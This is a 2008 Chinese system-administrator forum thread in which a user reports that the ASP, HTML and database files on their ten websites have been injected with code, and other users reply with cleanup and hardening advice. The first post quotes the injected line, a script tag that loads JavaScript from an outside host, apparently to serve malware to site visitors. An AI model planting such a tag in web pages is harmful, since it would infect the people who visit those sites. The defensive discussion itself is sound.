企业网管论坛 | 网吧网管论坛 | 网管软件下载 | 网管教程 | 网管招聘 | 网管培训 | 网吧游戏 | 网吧系统 | 服务器 | 安全 | 病毒 | 路由交换 | 数据库 | Windows | Linux
游客:  注册 | 登录 | 新手必看 | 网管知识库 | 网管博客 | 搜索 | 帮助 
我是网管首页 » 我是网管论坛 » 【 网络安全技术 】 » 服务器被批量注入代码

新手帮助 | 版主申请 | BST制度 | MST制度到底要不要升级到Windows Server 2008?

 
 
打印 | 推荐 | 订阅 | 收藏
标题: [入侵与防范] 服务器被批量注入代码 (查看:463 回复:5)
今天的我
学徒网管




UID 749236
精华 0
积分 5
帖子 2
MST币 5 点    
BST币 5 点    赚取
阅读权限 60
注册 2008-6-19
状态 离线
#1
 
[ 使用道具 ]  
发表于 2008-6-19 12:15  [ 资料 ]  [ 博客 ]  [ 短消息 ]  [ 加为好友
爱琴思邮件系统iGENUS V5.0
服务器被批量注入代码
本帖发表在我是网管论坛,帖子地址:http://bbs.54master.com/256724,1,1
我的服务器上有十个网站,这几天经常被批量注入代码,连数据库文件也被注入
主要影响主件有:index.asp  conn.asp  user.asp  index.htm  index.htm config.asp
病毒代码为:<script src=http://www.qn518.com/mm/1.js></script>
我是用批量替换方法解决的,但是多少还会有一些问题,而且一定要覆盖数据库文件才能彻底解决
请教版主及各位如何更好解决已发现的问题
如何防范此类问题再发生??
有没有好的软件?
谢谢了

[ 点这里复制网址,推荐给你QQ/MSN上的好友们! ]
本站声明:以上内容由网友 今天的我 提供,与54master立场无关!
[ 顶部 ]
sunlin19
初级网管



UID 462718
精华 2
积分 126
帖子 1195
MST币 4320 点    
BST币 126 点    赚取
阅读权限 80
注册 2006-11-30
来自 辽宁省-大连市
状态 离线
#2
 
[ 使用道具 ]  
发表于 2008-6-19 12:34  [ 资料 ]  [ 博客 ]  [ 主页 ] [ 短消息 ]  [ 加为好友添加 sunlin19 为MSN好友 通过MSN和 sunlin19 交谈 QQ
我 帮你顶一下,我会继续关注,希望有更多的人帮助你
我也能从中学习下

本站声明:以上内容由网友 sunlin19 提供,与54master立场无关!
《我是网管》论坛
光与影见证着时间的飞驶.也许一切都无法回到从前.但向更远的地方走去,一定会有阳光和彩虹!
[ 顶部 ]
yu2885
版主



现役斑竹  
UID 264662
精华 1
积分 493
帖子 2612
MST币 1426 点    
BST币 493 点    赚取
阅读权限 180
注册 2004-10-23
状态 离线
#3
 
[ 使用道具 ]  
发表于 2008-6-19 13:44  [ 资料 ]  [ 博客 ]  [ 短消息 ]  [ 加为好友QQ
RE
1.用XCAN等扫描工具,检查系统或网站程序是否存在漏洞
2.系统安全设置,系统及软件的补丁及时更新
3.及时对网站数据进行备份
4.锁定IP目标,对IP进行筛选限制方法,并进行备案、

本站声明:以上内容由网友 yu2885 提供,与54master立场无关!
《我是网管》论坛
你想成才吗?你想泡妞吗?请随时关注MOUSE的博客:http://blog.54master.com/?uid/264662
[ 顶部 ]
自定义
学徒网管




UID 571802
精华 0
积分 5
帖子 43
MST币 6 点    
BST币 5 点    赚取
阅读权限 60
注册 2007-9-2
状态 离线
#4
 
[ 使用道具 ]  
发表于 2008-6-19 15:51  [ 资料 ]  [ 博客 ]  [ 短消息 ]  [ 加为好友
建议楼主暂时恢复完成了要先做好两件事

第一、备份数据库
第二、查找漏洞和后门并修复

现在总有一些个2B挂个马,不像我是好人,只看从不挂,哈哈

本站声明:以上内容由网友 自定义 提供,与54master立场无关!
[ 顶部 ]
eedream
入门网管




UID 408009
精华 0
积分 50
帖子 23
MST币 657 点    
BST币 50 点    赚取
阅读权限 70
注册 2006-7-8
状态 离线
#5
 
[ 使用道具 ]  
发表于 2008-6-27 09:41  [ 资料 ]  [ 博客 ]  [ 短消息 ]  [ 加为好友
哈哈!!做好备份最重要!

本站声明:以上内容由网友 eedream 提供,与54master立场无关!
[ 顶部 ]
hulzh
入门网管




UID 383700
精华 0
积分 50
帖子 45
MST币 724 点    
BST币 50 点    赚取
阅读权限 70
注册 2006-5-26
状态 离线
#6
 
[ 使用道具 ]  
发表于 2008-7-1 14:27  [ 资料 ]  [ 博客 ]  [ 短消息 ]  [ 加为好友
这样的事情,我们也每年遇上1-2回,原因很简单,网站被注入,上传了asp木马。处理的方法是:
1、找到源头:使用asp木马侦察工具(如“淘特”,十分有效。),对每个网站扫描,特别要注意加密的asp网页。
2、查日志,根据木马文件的名称、上传时间查。找到元凶!!
3、封权限,对可以上传的文件夹单独设置权限为“无”!!
4、检查网站自身的安全性,加入防注入代码。
5、使用Ultraedit替换还原(如果网页文件没有被删除)。
6、系统安全的加强,软硬件防火墙的正确使用就不多说了。

本站声明:以上内容由网友 hulzh 提供,与54master立场无关!
[ 顶部 ]
  
 



当前时区 GMT+8, 现在时间是 2008-10-12 10:51

Powered by Discuz! 5.5.0  © 2001-2007 Comsenz Inc.
Processed in 0.043703 second(s), 12 queries , Gzip enabled
TOP

清除 Cookies - 关于我是网管 - 联系我是网管 - 广告服务 - 诚聘版主 - 无图版 - WAP -